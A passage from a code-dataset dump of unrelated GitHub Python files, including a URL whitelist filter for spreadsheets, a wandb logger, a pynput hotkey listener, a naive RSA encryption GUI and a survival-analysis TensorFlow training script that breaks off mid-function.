start:\r\n# headers = row\r\n\r\nwhitelist = input(\"Whitelist text file name: \")\r\ntext = []\r\nwith open(whitelist, 'r', encoding='utf-8') as txt:\r\n text = txt.readlines()\r\n\r\ncolumn = int(input(\"Column with data: \")) - 1\r\n\r\nfiltered = []\r\nfor i, row in enumerate(sheet):\r\n if i == start:\r\n headers = row\r\n if row[0] == None:\r\n break\r\n elif i > start:\r\n url = row[column]\r\n if \"/\" in url:\r\n s = url.split('/')\r\n url = s[2]\r\n good = False\r\n for x in text:\r\n val = x.strip('\\n')\r\n if url in val:\r\n good = True\r\n if not good:\r\n element = []\r\n for z in row:\r\n if z == None:\r\n break\r\n else:\r\n element.append(z)\r\n filtered.append(element)\r\n\r\nnewFilename = input(\"New file location/name: \")\r\nnewFile = pyxl.Workbook()\r\nnewSheet = newFile.create_sheet(title=sheetName)\r\n\r\nfor i, h in enumerate(headers):\r\n newSheet.cell(row=1, column=i+1, value=h)\r\nif len(filtered) != 0:\r\n for r in range(1, len(filtered)+1):\r\n for c in range(len(filtered[0])):\r\n if c >= len(filtered[r-1]):\r\n newSheet.cell(row=r+1, column=c+1, value=None)\r\n else:\r\n newSheet.cell(row=r+1, column=c+1, value=filtered[r-1][c])\r\nnewFile.save(filename=newFilename)","repo_name":"loganwyas/test","sub_path":"url-whitelist.py","file_name":"url-whitelist.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70437969721","text":"# defines wandb logger\nimport os\nimport wandb \nfrom datetime import datetime\nfrom typing import Dict\nfrom argparse import Namespace\n\nclass WandbLogger(object):\n def __init__(self, args: Namespace):\n super().__init__()\n self._step = 0\n self._debug = args.debug\n now = datetime.now()\n exp_name = args.exp_name + \"-\" + str(now).replace(\" \", \"-\")\n wandb_input = {\n \"entity\": \"lil\",\n \"name\": exp_name,\n \"config\": args\n }\n wandb_input[\"project\"] = \"p-interactive-touchdown-sdr-vilt-debug\" if args.debug else \"p-interactive-touchdown-sdr-vilt\"\n if args.wandb_run_id is not None:\n wandb_input[\"id\"] = args.wandb_run_id\n wandb_input[\"resume\"] = \"must\"\n wandb.init(**wandb_input)\n\n self._sdr_train_loss_keys = []\n\n def log(self, results, split: str, step: int = None, commit=False):\n formated_results = {}\n if step is not None:\n self._step = step\n\n for k, v in results.items():\n formated_results[\"{}/{}\".format(split, k)] = v\n wandb.log(formated_results, step=self._step, commit=commit)\n\n def get_step(self):\n return self._step\n\n\n \n","repo_name":"lil-lab/phrase_grounding","sub_path":"src/utils/wandb_utils.py","file_name":"wandb_utils.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"35059854930","text":"from django import forms\n\nfrom timeline.models import Entry as TimelineEntry\n\n\nclass EntryForm(forms.ModelForm):\n class Meta:\n fields = ('lesson_type', 'lesson_id', 'teacher', 'start')\n localized_fields = ('start',)\n model = TimelineEntry\n widgets = {\n 'start': forms.SplitDateTimeWidget(),\n 'lesson_id': forms.Select(), # populated by calendar.coffee\n 'teacher': forms.HiddenInput() # populated in the template\n }\n","repo_name":"die-trying/django-celery","sub_path":"timeline/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"40"} +{"seq_id":"9229735326","text":"# http://scikit-learn.org/stable/modules/linear_model.html#ridge-regression\n\nfrom sklearn import linear_model\n\n# As with other linear models, Ridge will take in its fit method arrays X, y and will store the coefficients w of the\n# linear model in its coef_ member:\nreg = linear_model.Ridge(alpha=.5)\n\nreg.fit([[0, 0], [0, 0], [1, 1]], [0, .1, 1])\n# Ridge(alpha=0.5, copy_X=True, fit_intercept=True, max_iter=None, normalize=False, random_state=None, solver='auto', tol=0.001)\n\nprint(reg.coef_) # [0.34545455 0.34545455]\nprint(reg.intercept_) # 0.13636363636363638\n","repo_name":"raunakshakya/PythonPractice","sub_path":"scikit-learn/09_ridge_regression.py","file_name":"09_ridge_regression.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"32844755595","text":"from pynput import keyboard\nimport datetime\nCOMBINATIONS=[\n {keyboard.Key.alt_l,keyboard.KeyCode(char='a')},\n {keyboard.Key.alt_l,keyboard.KeyCode(char='A')},\n]\ncurrent = set()\n\ndef execute():\n print(\"时间:{0};按下 home\".format(datetime.datetime.now()))\n\ndef on_press(key):\n if any([key in COMBO for COMBO in COMBINATIONS]):\n current.add(key)\n if any(all(k in current for k in COMBO) for COMBO in COMBINATIONS):\n execute()\n\ndef on_release(key):\n if any([key in COMBO for COMBO in COMBINATIONS]):\n current.remove(key)\n\nwith keyboard.Listener(on_press=on_press,on_release=on_release) as listener:\n listener.join()\n","repo_name":"jabzer/pyCode","sub_path":"learn/hotkey.py","file_name":"hotkey.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"13734207489","text":"from ..env.wrapper import *\nfrom ..utils.logger import Logger\nfrom .sim.openraas_greedy import *\n\nclass SimulationAgent(object):\n def __init__(self, config, log_dir=''):\n self.config = config\n self.max_episodes = config[\"num_ep_train\"]\n self.max_steps = config['max_ep_length']\n \n # Environment\n self.env_wrapper = EnvWrapper(config)\n \n # Algorithm\n self.alg = OPGreedy()\n \n # Logger\n log_path = f\"{log_dir}/simulation\"\n self.logger = Logger(log_path)\n \n def run(self):\n env = self.env_wrapper\n config = self.config\n \n def get_state_clip(s, length):\n # reset self.temp_point beforing using this function\n begin = self.temp_point\n end = begin + length\n self.temp_point = end\n return s[begin:end]\n \n for episode in range(self.max_episodes):\n state = env.reset()\n \n for step in range(self.max_steps):\n task_info_num = config['task_info_num']\n filestore_info_num = config['filestore_info_num']\n candidates_num = config['candidates_num']\n \n # 1. modify state\n num = state.__len__()\n tasks_info = [] # (num, task_info_num)\n compute_info = [] # (num, 2)\n all_cand_num = [] # (num, 1)\n top_cand_info = [] # (num, candidates_num, filestore_info_num)\n true_candidates_num = [candidates_num for _ in range(num)]\n \n for n in range(num):\n self.temp_point = 0\n tasks_info.append(get_state_clip(state[n], task_info_num))\n compute_info.append(get_state_clip(state[n], 2))\n all_cand_num.append(get_state_clip(state[n], 1))\n candidates = get_state_clip(state[n], filestore_info_num * candidates_num)\n sepeated_cand_info = []\n for i in range(candidates_num):\n info = candidates[i * filestore_info_num : (i+1) * filestore_info_num]\n if np.sum(info) == -3.:\n true_candidates_num[n] = i\n break\n sepeated_cand_info.append(info)\n top_cand_info.append(sepeated_cand_info)\n \n # tasks_info = np.array(tasks_info)\n # compute_info = np.array(compute_info)\n # all_cand_num = np.array(all_cand_num)\n # top_cand_info = np.array(top_cand_info)\n \n # 2. gain action\n actions = []\n for i in range(num):\n if compute_info[i][0] == -1. or true_candidates_num[i] == 0:\n actions.append(-1)\n continue\n bws = [top_cand_info[i][j][0] for j in range(true_candidates_num[i])]\n ls = [top_cand_info[i][j][1] for j in range(true_candidates_num[i])]\n js = [top_cand_info[i][j][2] for j in range(true_candidates_num[i])]\n a = self.alg.get_action(compute_info[i][1], bws, ls, js)\n actions.append(a)\n \n actions = np.array(actions)\n \n # 3. go into next step\n state, reward, _ = env.step(actions)\n \n print(f\"E{episode}S{step}: reward={np.mean(reward)}\")","repo_name":"coolmoon327/OpenRaaS-Simulation","sub_path":"deprecated/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":3619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"43595897581","text":"# This is a sample Python script.\n\n# Press ⌃R to execute it or replace it with your code.\n# Press Double ⇧ to search everywhere for classes, files, tool windows, actions, and settings.\nimport random\nimport threading\nimport time\nimport sys\nfrom ui import Ui_MainWindow\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QMessageBox\n\nsys.setrecursionlimit(100000)\n\n\ndef generate_random_int_less(num):\n return random.randint(2, num)\n\n\ndef generate_random_int(length):\n ret = random.getrandbits(length)\n if ret % 2 == 0:\n return ret - 1\n else:\n return ret\n\n\ndef gcd(a, b):\n while b != 0:\n tmp = a % b\n a = b\n b = tmp\n return a\n\n\ndef fast_pow(num, k, mod):\n ret = 1\n while k > 0:\n if k % 2 == 1:\n ret = ret * num % mod\n num = num * num % mod\n k = k // 2\n return ret\n\n\ndef inverse(e, phi_n):\n arr = [0, 1, ]\n ret = extended_euclid(e, phi_n, arr)\n if ret == 1:\n return (arr[0] % phi_n + phi_n) % phi_n\n else:\n return -1\n\n\ndef extended_euclid(a, phi_n, arr):\n if phi_n == 0:\n arr[0] = 1\n arr[1] = 0\n return a\n ret = extended_euclid(phi_n, a % phi_n, arr)\n tmp = arr[0]\n arr[0] = arr[1]\n arr[1] = tmp - a // phi_n * arr[1]\n return ret\n\n\ndef get_e(phi_n):\n while True:\n _e = random.randint(2, phi_n)\n if gcd(_e, phi_n) == 1:\n return _e\n\n\ndef is_composite(a, m, k, num):\n if fast_pow(int(a), int(m), int(num)) == 1:\n return False\n for j in range(k):\n if fast_pow(int(a), int(m * (2 ** j)), int(num)) == num - 1:\n return False\n return True\n\n\ndef is_prime(num, certainty):\n prime_list = [3, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97, 101,\n 103,\n 107, 109, 113, 127, 131, 137, 139, 149, 151, 157, 163, 167, 173, 179, 181, 191, 193, 197, 199,\n 211,\n 223, 227, 229, 233, 239, 241, 251, 257, 263, 269, 271, 277, 281, 283, 293, 307, 311, 313, 317,\n 331,\n 337, 347, 349, 353, 359, 367, 373, 379, 383, 389, 397, 401, 409, 419, 421, 431, 433, 439, 443,\n 449,\n 457, 461, 463, 467, 479, 487, 491, 499, 503, 509, 521, 523, 541, 547, 557, 563, 569, 571, 577,\n 587,\n 593, 599, 601, 607, 613, 617, 619, 631, 641, 643, 647, 653, 659, 661, 673, 677, 683, 691, 701,\n 709,\n 719, 727, 733, 739, 743, 751, 757, 761, 769, 773, 787, 797, 809, 811, 821, 823, 827, 829, 839,\n 853,\n 857, 859, 863, 877, 881, 883, 887, 907, 911, 919, 929, 937, 941, 947, 953, 967, 971, 977, 983,\n 991,\n 997, 1009, 1013, 1019, 1021, 1031, 1033, 1039, 1049, 1051, 1061, 1063, 1069, 1087, 1091, 1093,\n 1097,\n 1103, 1109, 1117, 1123, 1129, 1151, 1153, 1163, 1171, 1181, 1187, 1193, 1201, 1213, 1217, 1223,\n 1229,\n 1231, 1237, 1249, 1259, 1277, 1279, 1283, 1289, 1291, 1297, 1301, 1303, 1307, 1319, 1321, 1327,\n 1361,\n 1367, 1373, 1381, 1399, 1409, 1423, 1427, 1429, 1433, 1439, 1447, 1451, 1453, 1459, 1471, 1481,\n 1483,\n 1487, 1489, 1493, 1499, 1511, 1523, 1531, 1543, 1549, 1553, 1559, 1567, 1571, 1579, 1583, 1597,\n 1601,\n 1607, 1609, 1613, 1619, 1621, 1627, 1637, 1657, 1663, 1667, 1669, 1693, 1697, 1699, 1709, 1721,\n 1723,\n 1733, 1741, 1747, 1753, 1759, 1777, 1783, 1787, 1789, 1801, 1811, 1823, 1831, 1847, 1861, 1867,\n 1871,\n 1873, 1877, 1879, 1889, 1901, 1907, 1913, 1931, 1933, 1949, 1951, 1973, 1979, 1987, 1993, 1997,\n 1999]\n for prime in prime_list:\n if num == prime:\n return True\n if num % prime == 0:\n return False\n m = num - 1\n k = 0\n while m % 2 == 0: # num - 1 = m * 2 ^ k\n m = m // 2\n k += 1\n\n for i in range(certainty):\n a = generate_random_int_less(num - 1)\n if is_composite(a, m, k, num):\n return False\n return True\n\n\ndef generate_random_prime(length, certainty):\n ret = generate_random_int(length)\n\n while not is_prime(ret, certainty):\n # print(ret)\n ret += 2\n return ret\n\n\nclass MyThread(threading.Thread):\n def __init__(self, target, args, name):\n super(MyThread, self).__init__()\n self.target = target\n self.args = args\n self.prime = 2\n self.name = name\n\n def run(self):\n start = time.time()\n self.prime = self.target(*self.args)\n print(self.name, time.time() - start)\n\n def get_prime(self):\n try:\n return self.prime\n except Exception:\n return None\n\n\nclass MyMainForm(QMainWindow, Ui_MainWindow):\n def __init__(self, parent=None):\n super(MyMainForm, self).__init__(parent)\n self.setupUi(self)\n self.btn_en.clicked.connect(self.encrypt)\n self.btn_de.clicked.connect(self.decrypt)\n self.btn_de_crt.clicked.connect(self.crt_decrypt)\n self.btn_gen.clicked.connect(self.generate_key)\n self.n = 0\n self.e = 0\n self.d = 0\n self.p = 0\n self.q = 0\n self.ciphertext = ''\n self.message = ''\n\n def generate_key(self):\n type = self.comboBox.currentText()\n len = 0\n if type == 'RSA-768':\n len = 768\n elif type == 'RSA-1024':\n len = 1024\n elif type == 'RSA-2048':\n len = 2048\n elif type == 'RSA-4096':\n len = 4096\n\n start = time.time()\n\n # multi threads\n\n # random.seed(10)\n # try:\n # thread_p = MyThread(target=generate_random_prime, args=(len // 2, 5), name='p')\n # thread_q = MyThread(target=generate_random_prime, args=(len // 2, 5), name='q')\n # except:\n # print('Error: unable to start thread')\n # return\n # thread_q.start()\n # thread_p.start()\n # thread_q.join()\n # thread_p.join()\n # gen_p = thread_p.get_prime()\n # gen_q = thread_q.get_prime()\n\n # start = time.time()\n gen_p = generate_random_prime(len // 2, 5)\n # print('p:', time.time() - start)\n # start = time.time()\n gen_q = generate_random_prime(len // 2, 5)\n # print('q:', time.time() - start)\n gen_n = gen_p * gen_q\n phi_n = (gen_p - 1) * (gen_q - 1)\n gen_e = get_e(phi_n)\n gen_d = inverse(gen_e, phi_n)\n self.gen_time.setText(str(round(time.time() - start, 4)) + 's')\n self.n = gen_n\n self.e = gen_e\n self.d = gen_d\n self.p = gen_p\n self.q = gen_q\n # print(hex(self.n))\n # print(hex(self.d))\n # print(hex(self.e))\n # print(hex(self.p))\n # print(hex(self.q))\n self.val_N_pub.setText(str(hex(gen_n))[2:])\n self.val_N_pri.setText(str(hex(gen_n))[2:])\n self.val_E.setText(str(hex(gen_e))[2:])\n self.val_D.setText(str(hex(gen_d))[2:])\n self.val_P.setText(str(hex(gen_p))[2:])\n self.val_Q.setText(str(hex(gen_q))[2:])\n return gen_n, gen_e, gen_d, gen_p, gen_q\n\n def encrypt(self):\n try:\n # print(self.val_N.toPlainText())\n self.n = int(self.val_N_pub.toPlainText(), base=16)\n self.e = int(self.val_E.toPlainText(), base=16)\n self.message = self.message_input.toPlainText()\n except:\n QMessageBox.warning(self, '提示', '请检查公钥和明文', QMessageBox.No | QMessageBox.Yes, QMessageBox.Yes)\n return\n\n if self.message == '':\n QMessageBox.warning(self, '提示', '请填写明文', QMessageBox.No | QMessageBox.Yes, QMessageBox.Yes)\n return\n\n start = time.time()\n self.ciphertext = ''\n for i in range(-(-len(self.message) // 20)):\n m_slice = int.from_bytes(self.message[20 * i: 20 * (i + 1)].encode(\"utf-8\"), byteorder=\"big\")\n # print('m_slice:', m_slice)\n c_slice = fast_pow(m_slice, self.e, self.n)\n # print('c_slice:', hex(c_slice))\n self.ciphertext += '<ciphertext>' + str(hex(c_slice)[2:]) + '</ciphertext>\\n'\n self.ciphertext_input.setText(self.ciphertext)\n self.en_time.setText(str(round(time.time() - start, 4)) + 's')\n # return self.fast_pow(self.message, self.e, self.n)\n\n def decrypt(self):\n try:\n # print(self.val_N.toPlainText())\n self.n = int(self.val_N_pri.toPlainText(), base=16)\n self.d = int(self.val_D.toPlainText(), base=16)\n self.ciphertext = self.ciphertext_input.toPlainText()\n except:\n QMessageBox.warning(self, '��示', '请检查私钥和明文', QMessageBox.No | QMessageBox.Yes, QMessageBox.Yes)\n return\n\n if self.ciphertext == '':\n QMessageBox.warning(self, '提示', '请填写密文', QMessageBox.No | QMessageBox.Yes, QMessageBox.Yes)\n return\n\n start = time.time()\n c_list = self.ciphertext_input.toPlainText().split('\\n')\n # print(c_list)\n m = ''\n # print(hex(self.n))\n # print(hex(self.d))\n for i in range(len(c_list) - 1):\n try:\n m_slice = fast_pow(int(c_list[i][12:-13], base=16), self.d, self.n)\n # print('m_slice:', m_slice)\n m += m_slice.to_bytes(((m_slice.bit_length() + 7) // 8), byteorder=\"big\").decode(\"utf-8\")\n except:\n QMessageBox.warning(self, '提示', '请检查密文的正确性', QMessageBox.No | QMessageBox.Yes, QMessageBox.Yes)\n return\n\n self.ciphertext_input.setText(m)\n self.de_time.setText(str(round(time.time() - start, 4)) + 's')\n\n # return self.fast_pow(self.ciphertext, self.d, self.n)\n\n def crt_decrypt(self):\n try:\n # print(self.val_N.toPlainText())\n self.n = int(self.val_N_pri.toPlainText(), base=16)\n self.d = int(self.val_D.toPlainText(), base=16)\n self.p = int(self.val_P.toPlainText(), base=16)\n self.q = int(self.val_Q.toPlainText(), base=16)\n self.ciphertext = self.ciphertext_input.toPlainText()\n except:\n QMessageBox.warning(self, '提示', '请检查私钥和明文', QMessageBox.No | QMessageBox.Yes, QMessageBox.Yes)\n return\n\n if self.ciphertext == '':\n QMessageBox.warning(self, '提示', '请填写密文', QMessageBox.No | QMessageBox.Yes, QMessageBox.Yes)\n return\n\n start = time.time()\n c_list = self.ciphertext_input.toPlainText().split('\\n')\n # print(c_list)\n m = ''\n # print(self.n)\n # print(self.d)\n for i in range(len(c_list) - 1):\n try:\n m_slice = (fast_pow(int(c_list[i][12:-13], base=16) % self.q, self.d % (self.q - 1), self.q) *\n self.p * inverse(self.p, self.q) +\n fast_pow(int(c_list[i][12:-13], base=16) % self.p, self.d % (self.p - 1), self.p) *\n self.q * inverse(self.q, self.p)) % self.n\n # print('m_slice: ', m_slice)\n m += m_slice.to_bytes(((m_slice.bit_length() + 7) // 8), byteorder=\"big\").decode(\"utf-8\")\n except:\n QMessageBox.warning(self, '提示', '请检查密文的正确性', QMessageBox.No | QMessageBox.Yes, QMessageBox.Yes)\n return\n\n self.ciphertext_input.setText(m)\n self.de_time.setText(str(round(time.time() - start, 4)) + 's')\n # return (fast_pow(self.ciphertext % self.q, self.d % (self.q - 1), self.q) *\n # self.p * self.inverse(self.p, self.q) +\n # fast_pow(self.ciphertext % self.p, self.d % (self.p - 1), self.p) *\n # self.q * self.inverse(self.q, self.p)) % self.n\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n myWin = MyMainForm()\n myWin.show()\n sys.exit(app.exec_())\n\n # print('Generate Key...')\n # start = time.time()\n # n, e, d, p, q = generate_key(1024, 5)\n # print(time.time() - start)\n #\n # m = 'test'\n # c = ''\n # m_list = []\n # c_list = []\n #\n # print('Encryption...')\n # start = time.time()\n # for i in range(-(-len(m) // 20)):\n # m_slice = int.from_bytes(m[20 * i: 20 * (i + 1)].encode(\"utf-8\"), byteorder=\"big\")\n # c_slice = encrypt(m_slice, e, n)\n # # print(c_slice)\n # c_list.append(c_slice)\n # c += '<ciphertext>' + str(hex(int(c_slice))) + '</ciphertext>\\n'\n #\n # print(time.time() - start)\n #\n # print('Decryption:')\n # start = time.time()\n # c_list = c.split('\\n')\n # m = ''\n # for i in range(len(c_list) - 1):\n # m_slice = decrypt(int(c_list[i][12:-13], base=0), d, n)\n # m += m_slice.to_bytes(((m_slice.bit_length() + 7) // 8), byteorder=\"big\").decode(\"utf-8\")\n #\n # print(time.time() - start)\n # print(m)\n #\n # print('Decryption with CRT:')\n # start = time.time()\n # c_list = c.split('\\n')\n # m = ''\n # for i in range(len(c_list) - 1):\n # m_slice = crt_decrypt(int(c_list[i][12:-13], base=0), d, n, p, q)\n # m += m_slice.to_bytes(((m_slice.bit_length() + 7) // 8), byteorder=\"big\").decode(\"utf-8\")\n #\n # print(time.time() - start)\n # print(m)\n","repo_name":"Aiemu/naiveRSA","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13624,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"43292661864","text":"__all__ = (\"Session\",\"session_info\")\n\n\ndef session_info(environ):\n return {\n \"ip\": (environ.get(\"REMOTE_ADDR\", \"\"), environ.get(\"REMOTE_HOST\", \"\")),\n \"agent\": environ.get(\"HTTP_USER_AGENT\", ())\n }\n\n\ndef hex36(num):\n key = '0123456789abcdefghijklmnopqrstuvwxyz'\n a = []\n while num >= 1:\n a.append(key[int(num % 36)])\n num = num / 36\n a.reverse()\n out = ''.join(a)\n return out\n\n\nclass Session(dict):\n @property\n def sid(self):\n return hex36(id(self))\n\n\nif __name__ == '__main__':\n s1 = Session()\n s1[\"1\"] = 1\n s2 = Session()\n s3 = Session()\n\n print(s1, s1.sid)\n print(s2, s2.sid)\n print(s3, s3.sid)\n","repo_name":"zhzLuke96/Yoi","sub_path":"yoi/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9635669630","text":"n = input()\nresult = list()\nfor i in n:\n result.append(int(i))\nresult.sort(reverse=True)\nfor i in result:\n print(i, end='')\n\n'''\n# 9부터 0까지 자릿수 확인\narray = input()\nfor i in range(9, -1, -1):\n for j in array:\n if int(j) == i:\n print(i, end='')\n'''","repo_name":"annahxxl/algorithm-study","sub_path":"problem-solving/boj/etc/소트인사이드_1427.py","file_name":"소트인사이드_1427.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8070463541","text":"\nclass Marks():\n def ReadFile(self, filename):\n Students = dict()\n Math = dict()\n Language = dict()\n f = open(filename, \"r\")\n lines = []\n final = []\n for line in f:\n lines.append(line)\n subject = lines[0]\n for i in lines[1:]:\n final.append(i)\n str1 = ''.join(final)\n Students = dict((str(x.strip()), int(y.strip())) for x, y in (i.split('-') for i in str1.split('\\n')))\n if subject==\"Math\\n\":\n Math = dict(Students)\n return Math \n elif subject == \"Language\\n\":\n Language = dict(Students)\n return Language\n \n def ReadMaks_and_CountAvarage(self,filename1,filename2):\n Total = {}\n Math = self.ReadFile(filename1)\n Language = self.ReadFile(filename2)\n result = open('C:/Users/OChernovolyk/Desktop/Teachers_Reports/Teachers_Reports/bin/Debug/final.txt', \"w\")\n result.write(\"Avarage\" + '\\n')\n\n for d in Math, Language:\n for k, v in d.items():\n if Total.get(k) is None:\n Total[k] = []\n if v not in Total.get(k):\n Total[k].append(v)\n for d in Total.keys():\n l = len(Total[d])\n if l < 2:\n Av = (Total[d][0] + 0)/2\n else:\n Av = (Total[d][0] + Total [d][1])/2\n result.write(d +\" \"+ \"-\" +\" \"+ str(Av)+ '\\n')\n result.close()\ns = Marks( )\ns.ReadMaks_and_CountAvarage('C:/Users/OChernovolyk/Desktop/Teachers_Reports/Teachers_Reports/bin/Debug/subject1.txt', 'C:/Users/OChernovolyk/Desktop/Teachers_Reports/Teachers_Reports/bin/Debug/subject2.txt')\n\n\n\n \n","repo_name":"ElenQa/PythonApplication1","sub_path":"PythonApplication1/PythonApplication1.py","file_name":"PythonApplication1.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"14381233129","text":"#!/usr/bin/env python \r\n# -*- coding: utf-8 -*- \r\n# @Time : 6/1/2021 1:56 PM \r\n# @Author : Zhicheng Zhang \r\n# @E-mail : zhicheng0623@gmail.com\r\n# @Site : \r\n# @File : Train.py \r\n# @Software: PyCharm\r\n\r\nimport numpy as np\r\nimport os\r\nimport sys\r\n\r\nsys.path.append(os.path.join(os.path.abspath(os.path.dirname(__file__)), 'utils'))\r\n\r\nimport warnings\r\n\r\nwarnings.filterwarnings(\"ignore\")\r\nimport tensorflow as tf\r\nimport datetime, time\r\nimport utils.ckpt as ckpt\r\nimport random\r\nimport copy\r\nfrom ops import *\r\n\r\nfrom sklearn.metrics import confusion_matrix\r\nfrom sklearn.metrics import precision_score, recall_score, f1_score, roc_auc_score\r\n\r\n\r\n\r\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\r\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\r\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' # or any {'0', '1', '2'}\r\nos.environ['TF_ENABLE_AUTO_MIXED_PRECISION'] = '1'\r\n\r\n\r\nfrom numpy.random import seed\r\n\r\nseed(1)\r\nfrom tensorflow import set_random_seed\r\n\r\nset_random_seed(2)\r\nfrom imgaug import augmenters as iaa\r\n\r\naug90 = iaa.Sometimes(1, iaa.Affine(rotate=(-90, -90),mode=\"constant\",cval=(-1000,-1000)))\r\naug180 = iaa.Sometimes(1, iaa.Affine(rotate=(-180, -180),mode=\"constant\",cval=(-1000,-1000)))\r\naug270 = iaa.Sometimes(1, iaa.Affine(rotate=(-270, -270),mode=\"constant\",cval=(-1000,-1000)))\r\naugFlip1 = iaa.Sometimes(1, iaa.Fliplr(1))\r\naugFlip2 = iaa.Sometimes(1, iaa.Flipud(1))\r\naugCon= iaa.Sometimes(1, iaa.ContrastNormalization(0.5, 0.9))\r\naugBlur = iaa.Sometimes(1, iaa.GaussianBlur(sigma=(0.0, 0.8)))\r\naugSharpen = iaa.Sometimes(1, iaa.Sharpen(alpha=0.1, lightness=0.7))\r\n\r\nIx = Iy = 160\r\ndef augmentHK(image,k):\r\n w1 = image.reshape(image.shape[0], image.shape[1])\r\n # k = random.randrange(1, 7)\r\n global w2\r\n if k == 1:\r\n w2 = iaa.Sometimes(1, iaa.Affine(\r\n scale={\"x\": (0.8, 1.2), \"y\": (0.8, 1.2)},\r\n translate_percent={\"x\": (-0.2, 0.2), \"y\": (-0.2, 0.2)},\r\n rotate=(-180, 180)\r\n ,mode=\"constant\",cval=(0,0)\r\n )).augment_image(w1)\r\n elif k == 2:\r\n w2 = augFlip1.augment_image(w1)\r\n elif k == 3:\r\n w2 = augFlip2.augment_image(w1)\r\n elif k == 4:\r\n w2 = augCon.augment_image(w1)\r\n elif k == 5:\r\n w2 = augBlur.augment_image(w1)\r\n elif k == 6:\r\n w2 = augSharpen.augment_image(w1)\r\n else:\r\n w2 = w1\r\n w3 = w2.reshape( w2.shape[0], w2.shape[1])\r\n w4 = np.array(w3)\r\n return w4\r\naug = 6\r\n\r\n\r\n\r\nclass model(object):\r\n def __init__(self):\r\n self.w_init = tf.random_normal_initializer(mean=0.0, stddev=0.05)\r\n self.reg = tf.contrib.layers.l2_regularizer(scale=0.1)\r\n self.param = {}\r\n self.param['retrain'] = True\r\n\r\n self.param['model_save_path'] = os.path.join('./Results', os.path.basename(__file__).split('.')[0], 'model')\r\n self.param['tensorboard_save_logs'] = os.path.join('./logs', os.path.basename(__file__).split('.')[0])\r\n\r\n def _l2normalize(self, v, eps=1e-12):\r\n with tf.name_scope('l2normalize'):\r\n return v / (tf.reduce_sum(v ** 2) ** 0.5 + eps)\r\n\r\n def global_avg_pooling(self, x):\r\n gap = tf.reduce_mean(x, axis=[1, 2])\r\n return gap\r\n\r\n\r\n\r\n def swish(self, x):\r\n return x * tf.nn.sigmoid(x)\r\n\r\n def cox_loss(self, score, time_value, event):\r\n '''\r\n Args\r\n score: \t\tpredicted survival time_value, tf tensor of shape (None, 1)\r\n time_value:\t\ttrue survival time_value, tf tensor of shape (None, )\r\n event:\t\tevent, tf tensor of shape (None, )\r\n Return\r\n loss:\t\tpartial likelihood of cox regression\r\n '''\r\n\r\n ## cox regression computes the risk score, we want the opposite\r\n score = -score\r\n\r\n ## find index i satisfying event[i]==1\r\n ix = tf.where(tf.cast(event, tf.bool)) # shape of ix is [None, 1]\r\n\r\n ## sel_mat is a matrix where sel_mat[i,j]==1 where time_value[i]<=time_value[j]\r\n sel_mat = tf.cast(tf.gather(time_value, ix) <= time_value, tf.float32)\r\n\r\n ## formula: \\sum_i[s_i-\\log(\\sum_j{e^{s_j}})] where time_value[i]<=time_value[j] and event[i]==1\r\n p_lik = tf.gather(score, ix) - tf.log(tf.reduce_sum(sel_mat * tf.transpose(tf.exp(score)), axis=-1))\r\n # p_lik = tf.gather(score, ix) - tf.log(tf.reduce_sum(tf.transpose(tf.exp(score)), axis=-1))\r\n loss = -tf.reduce_mean(p_lik)\r\n\r\n return loss\r\n\r\n def hinge_loss(self, score, time_value, event):\r\n '''\r\n Args\r\n score:\t \tpredicted score, tf tensor of shape (None, 1)\r\n time_value:\t\ttrue survival time_value, tf tensor of shape (None, )\r\n event:\t\tevent, tf tensor of shape (None, )\r\n '''\r\n ## find index pairs (i,j) satisfying time_value[i]<time_value[j] and event[i]==1\r\n ix = tf.where(tf.logical_and(tf.expand_dims(time_value, axis=-1) < time_value,\r\n tf.expand_dims(tf.cast(event, tf.bool), axis=-1)), name='ix')\r\n ## if score[i]>score[j], incur hinge loss\r\n s1 = tf.gather(score, ix[:, 0])\r\n s2 = tf.gather(score, ix[:, 1])\r\n loss = tf.reduce_mean(tf.maximum(1 + s1 - s2, 0.0), name='loss')\r\n\r\n return loss\r\n\r\n def log_loss(self, score, time_value, event):\r\n '''\r\n Args\r\n score: \tpredicted survival time_value, tf tensor of shape (None, 1)\r\n time_value:\t\ttrue survival time_value, tf tensor of shape (None, )\r\n event:\t\tevent, tf tensor of shape (None, )\r\n '''\r\n ## find index pairs (i,j) satisfying time_value[i]<time_value[j] and event[i]==1\r\n ix = tf.where(tf.logical_and(tf.expand_dims(time_value, axis=-1) < time_value,\r\n tf.expand_dims(tf.cast(event, tf.bool), axis=-1)), name='ix')\r\n ## if score[i]>score[j], incur log loss\r\n s1 = tf.gather(score, ix[:, 0])\r\n s2 = tf.gather(score, ix[:, 